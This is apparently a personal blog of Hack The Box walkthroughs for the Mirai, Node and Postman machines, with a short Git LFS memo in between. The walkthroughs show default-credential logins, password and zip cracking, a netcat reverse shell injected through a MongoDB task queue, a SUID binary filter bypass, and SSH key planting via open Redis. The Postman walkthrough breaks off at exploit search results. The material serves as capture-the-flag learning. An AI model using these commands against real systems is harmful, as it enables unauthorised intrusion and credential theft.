10 Apr 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Mirai
.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.48 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 09:35 EEST
Nmap scan report for 10.10.10.48
Host is up ( 0.033s latency) .
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 ( protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 ( DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 ( RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b ( ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 ( ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1050/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.07 seconds
Gobuster HTTP:
root@kali:~# gobuster dir -u http://10.10.10.48 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @_FireFart_)
===============================================================
[ +] Url: http://10.10.10.48
[ +] Threads: 10
[ +] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[ +] Status codes: 200,204,301,302,307,401,403
[ +] User Agent: gobuster/3.0.1
[ +] Timeout: 10s
===============================================================
2020/04/10 09:37:20 Starting gobuster
===============================================================
/admin ( Status: 301)
/swfobject.js ( Status: 200)
===============================================================
2020/04/10 09:37:36 Finished
===============================================================
2. Getting User
We found an admin console in 10.10.10.48/admin/
.
The name of the service is Pi-hole
.
The default password for Pi-hole
is pi:raspberry
.
We can use it for the SSH login.
root@kali:~# sshpass -p raspberry ssh pi@10.10.10.48
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/* /copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 06:49:57 2020 from 10.10.14.32
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $
Now we got an user pi
.
user.txt
is in a directory /home/pi/Desktop
.
pi@raspberrypi:~ $ cat Desktop/user.txt
ff837707441b257a20e32199d7c8838d
3. Getting Root
Using sudo -l
, we can find out that we can run any command with root privilege.
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path = /usr/local/sbin\: /usr/local/bin\: /usr/sbin\: /usr/bin\: /sbin\: /bin
User pi may run the following commands on localhost:
( ALL : ALL) ALL
( ALL) NOPASSWD: ALL
Change the user and go to /root
.
We have root.txt
which says we don’t have the flag here.
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Using df -h
, we can find out /dev/sdb
is mounted on /media/usbstick
.
root@raspberrypi:~# df -h
Filesystem Size Used Avail Use% Mounted on
aufs 8.5G 2.8G 5.3G 34% /
tmpfs 100M 4.8M 96M 5% /run
/dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1
/dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs 250M 0 250M 0% /lib/live/mount/overlay
/dev/sda2 8.5G 2.8G 5.3G 34% /lib/live/mount/persistence/sda2
devtmpfs 10M 0 10M 0% /dev
tmpfs 250M 8.0K 250M 1% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 250M 0 250M 0% /sys/fs/cgroup
tmpfs 250M 8.0K 250M 1% /tmp
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick
tmpfs 50M 0 50M 0% /run/user/999
tmpfs 50M 0 50M 0% /run/user/1000
Then, go to /media/usbstick
.
There is an interesting file damnit.txt
.
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Sounds root.txt
has been deleted already.
We can find the flag by running strings
.
root@raspberrypi:~# strings /dev/sdb
> r &
/media/usbstick
lost+found
root.txt
damnit.txt
> r &
> r &
/media/usbstick
lost+found
root.txt
damnit.txt
> r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
> r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
07 Apr 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Node”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.58 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 21:28 EEST
Nmap scan report for 10.10.10.58
Host is up ( 0.040s latency) .
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 ( Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da ( RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c ( ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 ( ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done : 1 IP address ( 1 host up) scanned in 118.96 seconds
2. Getting User
We can find a NodeJS website on port 3000.
Using Burp Suite, we can find an interesting HTTP request to “/api/users/latest”.
Then, access to the API.
We can see some passwords for user “tom”, “mark” and “rastating”.
root@kali:~# curl -s http://10.10.10.58:3000/api/users/latest | jq
[
{
"_id" : "59a7368398aa325cc03ee51d" ,
"username" : "tom" ,
"password" : "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240" ,
"is_admin" : false
} ,
{
"_id" : "59a7368e98aa325cc03ee51e" ,
"username" : "mark" ,
"password" : "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73" ,
"is_admin" : false
} ,
{
"_id" : "59aa9781cced6f1d1490fce9" ,
"username" : "rastating" ,
"password" : "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0" ,
"is_admin" : false
}
]
Next, try “/api/users”.
We can find an admin user “myP14ceAdm1nAcc0uNT”.
root@kali:~# curl -s http://10.10.10.58:3000/api/users/ | jq
[
{
"_id" : "59a7365b98aa325cc03ee51c" ,
"username" : "myP14ceAdm1nAcc0uNT" ,
"password" : "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af" ,
"is_admin" : true
} ,
{
"_id" : "59a7368398aa325cc03ee51d" ,
"username" : "tom" ,
"password" : "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240" ,
"is_admin" : false
} ,
{
"_id" : "59a7368e98aa325cc03ee51e" ,
"username" : "mark" ,
"password" : "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73" ,
"is_admin" : false
} ,
{
"_id" : "59aa9781cced6f1d1490fce9" ,
"username" : "rastating" ,
"password" : "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0" ,
"is_admin" : false
}
]
We can crack the password using Crackstation.net .
The cracked password is “manchester”.
We can download a file “myplace.backup” base64 encoded.
Try to decode with base64 command.
root@kali:~# cat myplace.backup | base64 --decode > myplace
root@kali:~# file myplace
myplace: Zip archive data, at least v1.0 to extract
Since the zip file is password protected, try to brute-force using “fcrackzip”.
The password is “magicword”.
root@kali:~# unzip myplace
Archive: myplace
[ myplace] var/www/myplace/package-lock.json password:
root@kali:~# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace
possible pw found: magicword ()
Then, unzip the archive.
It looks like a source code of a NodeJS web application.
root@kali:~# unzip myplace
Archive: myplace
[ myplace] var/www/myplace/package-lock.json password:
inflating: var/www/myplace/package-lock.json
inflating: var/www/myplace/node_modules/serve-static/README.md
inflating: var/www/myplace/node_modules/serve-static/index.js
---
Take a look at the source code.
In “/var/www/myplace/app.js”, we can find a mongodb credential for user “mark”.
root@kali:~/var/www/myplace# cat app.js | grep mongo
const MongoClient = require( 'mongodb' ) .MongoClient;
const ObjectID = require( 'mongodb' ) .ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace' ;
console.log( '[!] Failed to connect to mongodb' ) ;
We can use the credential for SSH connection.
mark:5AYRft73VtFpc84k
root@kali:~# ssh mark@10.10.10.58
mark@10.10.10.58's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-' `` (|| |)
,` \ \ ` -` . 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` ' 88888' ' 88888' ' 88888' 88 88 ' 8888 '88888'
` -..-( )
` -`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/* /copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ id
uid = 1001( mark) gid = 1001( mark) groups = 1001( mark)
However, we are still not capable of getting user.txt.
We have other 2 users.
mark@node:/home$ ls -l
total 12
drwxr-xr-x 2 root root 4096 Aug 31 2017 frank
drwxr-xr-x 3 root root 4096 Sep 3 2017 mark
drwxr-xr-x 6 root root 4096 Sep 3 2017 tom
If take a look at the processes, we can see 2 processes by another user “tom”.
mark@node:~$ ps aux | grep tom
tom 1211 0.0 5.8 1074616 44232 ? Ssl 19:31 0:03 /usr/bin/node /var/scheduler/app.js
tom 1231 0.0 6.6 1024156 50068 ? Ssl 19:31 0:04 /usr/bin/node /var/www/myplace/app.js
mark 1610 0.0 0.1 14228 1020 pts/0 S+ 23:05 0:00 grep --color = auto tom
Using the following command, we can access the command line interface of MongoDB.
Also it is possible to insert reverse shell command.
mark@node:~$ mongo -u mark -p 5AYRft73VtFpc84k localhost/scheduler
MongoDB shell version: 3.2.16
connecting to: localhost/scheduler
> db.tasks.insertOne( { cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.6 4444 >/tmp/f" } ) ;
{
"acknowledged" : true ,
"insertedId" : ObjectId( "5e8b80f878ddbff46dfcb0d7" )
}
> exit
bye
Launch a netcat listener.
root@kali:~# nc -nlvp 4444
listening on [ any] 4444 ...
After a few minutes, we can get a reverse shell as user “tom”.
root@kali:~# nc -nlvp 4444
listening on [ any] 4444 ...
connect to [ 10.10.14.6] from ( UNKNOWN) [ 10.10.10.58] 38860
bash: cannot set terminal process group ( 1230) : Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator ( user "root" ) , use "sudo <command>" .
See "man sudo_root" for details.
tom@node:/$ id
id
uid = 1000( tom) gid = 1000( tom) groups = 1000( tom) ,4( adm) ,24( cdrom) ,27( sudo ) ,30( dip) ,46( plugdev) ,115( lpadmin) ,116( sambashare) ,1002( admin)
user.txt is in the directory “/home/tom”.
tom@node:/$ cd /home/tom
cd /home/tom
tom@node:~$ ls
ls
user.txt
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1
3. Getting Root
With the following command, we can find a binary file “/usr/local/bin/backup”
tom@node:/tmp$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount
Also, we can find a way to use this executable in the previous script “/var/www/myplace/app.js”.
The “backup_key” is also in this code.
200 app.get( '/api/admin/backup' , function ( req, res) {
201 if ( req.session.user && req.session.user.is_admin) {
202 var proc = spawn( '/usr/local/bin/backup' , [ '-q' , backup_key, __dirname ]) ;
203 var backup = '' ;
This time, we can bypass the filter of the binary with the following way.
tom@node:/tmp$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "/roo \t /roo \t .txt" | base64 -d > /tmp/flag.zip
<0afc3d98a8d0230167104d474 "/roo \t /roo \t .txt" | base64 -d > /tmp/flag.zip
tom@node:/tmp$ unzip -P magicword flag.zip
unzip -P magicword flag.zip
Archive: flag.zip
extracting: root/root.txt
Now we extracted the root.txt
tom@node:/tmp$ cat root/root.txt
cat root/root.txt
1722e99ca5f353b362556a62bd5e6be0
05 Apr 2020
Explanation
Git Large File Storage is an extension to replaces binary file with text pointers inside Git repository.
This is a memo of enabling GFS on GitHub,
Environment
Reference
Package installation
root@kali:~# git lfs install
Git LFS initialized.
Tracking PNG files
We need the following command for the tracking .png files.
$ git lfs track "*.png"
Tracking "*.png"
We can confirm that now we have “.gitattributes”
There is an entry for “.png” file.
$ cat .gitattributes
* .png filter = lfs diff = lfs merge = lfs -text
After that, we need to commit these files again.
$ git status
On branch Github-LFS
Changes not staged for commit:
( use "git add <file>..." to update what will be committed)
( use "git restore <file>..." to discard changes in working directory)
modified: public/images/2017-09-21/gcc-1.png
modified: public/images/2017-09-21/gcc-2.png
modified: public/images/2017-09-21/gcc-3.png
modified: public/images/2018-12-01/2018-12-05-09-49-17.png
modified: public/images/2018-12-01/2018-12-05-09-50-24.png
---
Then, commit and push the branch.
We see some diagnostic information about .png file upload.
$ git push origin Github-LFS
---
Enumerating objects: 761, done .0/310) , 21 MB | 965 KB/s
Counting objects: 100% ( 761/761) , done .
Delta compression using up to 8 threads
Compressing objects: 100% ( 376/376) , done .
Writing objects: 100% ( 385/385) , 50.71 KiB | 1.37 MiB/s, done .
Total 385 ( delta 5) , reused 0 ( delta 0)
---
Alternatively, we can use “git lfs migrate” command.
$ git lfs migrate import --include = "*.png"
migrate: override changes in your working copy? [ Y/n] Y
migrate: changes in your working copy will be overridden ...
migrate: Fetching remote refs: ..., done .
migrate: Sorting commits: ..., done .
migrate: Rewriting commits: 100% ( 2/2) , done .
master 33de649d04553205a0db99802b2b965459e284ce -> cb1533f0115d4a0caaa691b9c6eff20a73670e0a
migrate: Updating refs: ..., done .
migrate: checkout: ..., done .
After the command execution, we need to run the following command to remove the pre-existing objects.
$ git reflog expire --expire-unreachable = now --all
$ git gc --prune = now
Enumerating objects: 3197, done .
Counting objects: 100% ( 3197/3197) , done .
Delta compression using up to 8 threads
Compressing objects: 100% ( 1526/1526) , done .
Writing objects: 100% ( 3197/3197) , done .
Total 3197 ( delta 1642) , reused 3197 ( delta 1642)
Now we can see that our binary file is managed by Git LFS.
16 Mar 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Postman”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.160 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 18:54 EET
Nmap scan report for 10.10.10.160
Host is up ( 0.043s latency) .
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 ( Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 ( RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 ( ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 ( ED25519)
80/tcp open http Apache httpd 2.4.29 (( Ubuntu))
|_http-server-header: Apache/2.4.29 ( Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn' t have a title ( text/html; Charset = iso-8859-1) .
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done : 1 IP address ( 1 host up) scanned in 83.81 seconds
Gobuster HTTP:
root@kali:~# gobuster dir -u http://10.10.10.160 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @_FireFart_)
===============================================================
[ +] Url: http://10.10.10.160
[ +] Threads: 10
[ +] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[ +] Status codes: 200,204,301,302,307,401,403
[ +] User Agent: gobuster/3.0.1
[ +] Timeout: 10s
===============================================================
2020/03/14 18:59:56 Starting gobuster
===============================================================
/.hta ( Status: 403)
/.htaccess ( Status: 403)
/.htpasswd ( Status: 403)
/css ( Status: 301)
/fonts ( Status: 301)
/images ( Status: 301)
/index.html ( Status: 200)
/js ( Status: 301)
/server-status ( Status: 403)
/upload ( Status: 301)
===============================================================
2020/03/14 19:00:16 Finished
===============================================================
Redis enumeration:
Reference: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis
1n4r1@kali:~$ redis-cli -h 10.10.10.160
10.10.10.160:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:616
run_id:521dd2981efd190099f6fdc8744a20a1b3217664
tcp_port:6379
uptime_in_seconds:444
uptime_in_days:0
hz:10
lru_clock:7323466
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
---
10.10.10.160:6379> keys *
( empty list or set )
0.10.10.160:6379> config get *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
---
2. Summary
Port 22: OpenSSH running
Port 80: HTTP website running with Apache
Port 6379: Redis 4.0.9 running (anonymous access allowed)
Port 10000: Webmin httpd running
3. Getting User
Since we have access to redis, we can enumerate the file system with the following way.
As you can see, if we set a non-existing directory, it shows “No such file or directory”.
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/non-exist-directory
( error) ERR Changing directory: No such file or directory
This time, we can find a directory for ssh in the home directory of redis user.
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379>
Next, try to upload a public key for SSH.
root@kali:~# ( echo -e " \n\n " ; cat .ssh/id_rsa.pub; echo -e " \n\n " ) > pubkey.txt
root@kali:~# cat pubkey.txt | redis-cli -h 10.10.10.160 -x set pubkey
OK
After that, save the key into the “/var/lib/redis/.ssh/authorized_keys”.
root@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379>
Now we can SSH into the server as an user redis.
However, we don’t have the “user.txt” in the home directory of redis user.
root@kali:~# ssh redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ' 10.10.10.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$
With some enumeration, we can find an interesting file “id_rsa.bak” in the “/opt” directory.
redis@Postman:~$ ls /opt/
id_rsa.bak
redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
redis@Postman:~$
Try to download with scp.
root@kali:~# scp redis@10.10.10.160:/opt/id_rsa.bak /root
id_rsa.bak 100% 1743 38.3KB/s 00:00
root@kali:~#
Kali Linux can brute-force the password of a SSH private key with the John the Ripper.
However, we need to change the SSH private key into the hash which format is crackable by John the Ripper.
By cracking with “rockyou.txt”, we can achieve a password “computer2008” for someone.
root@kali:~# /usr/share/john/ssh2john.py id_rsa.bak > hash.txt
root@kali:~# john hash.txt -w = /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash ( SSH [ RSA/DSA/EC/OPENSSH ( SSH private keys) 32/64])
Cost 1 ( KDF/cipher [ 0 = MD5/AES 1 = MD5/3DES 2 = Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 ( iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 ( id_rsa.bak)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:06 DONE ( 2020-03-15 10:55) 0.1468g/s 2105Kp/s 2105Kc/s 2105KC/sa6_123..* 7¡Vamos!
Session completed
Actually, we have only one user “Matt” who is allowed to log in except redis.
This time, we can’t SSH but we can run su command to be the user “Matt”.
redis@Postman:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync :x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System ( admin) :/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$
The user.txt is in the home directory of user “Matt”.
Matt@Postman:~$ pwd
/home/Matt
Matt@Postman:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c
3. Getting Root
We still have one service that we haven’t looked through with is “Webmin httpd”.
For the privilege escalation, we can use the credential for Matt again.
By trying the credential for Matt, we can confirm that the credential for Matt is available for the authentication.
Matt:computer2008
Also, we can search the vulnerability for the Webmin v1.9.1 with searchsploit.
root@kali:~# searchsploit webmin
-------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| ( /usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | exploits/cgi/webapps/23535.txt
Webmin - Brute Force / Command Execution | exploits/multiple/remote/705.pl
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | exploits/linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation | exploits/linux/remote/21765.pl
Webmin 0.x - Code Input Validation | exploits/linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution | exploits/multiple/remote/746.pl
Webmin 1.5 - Web Brute Force ( CGI) | exploits/multiple/remote/745.pl
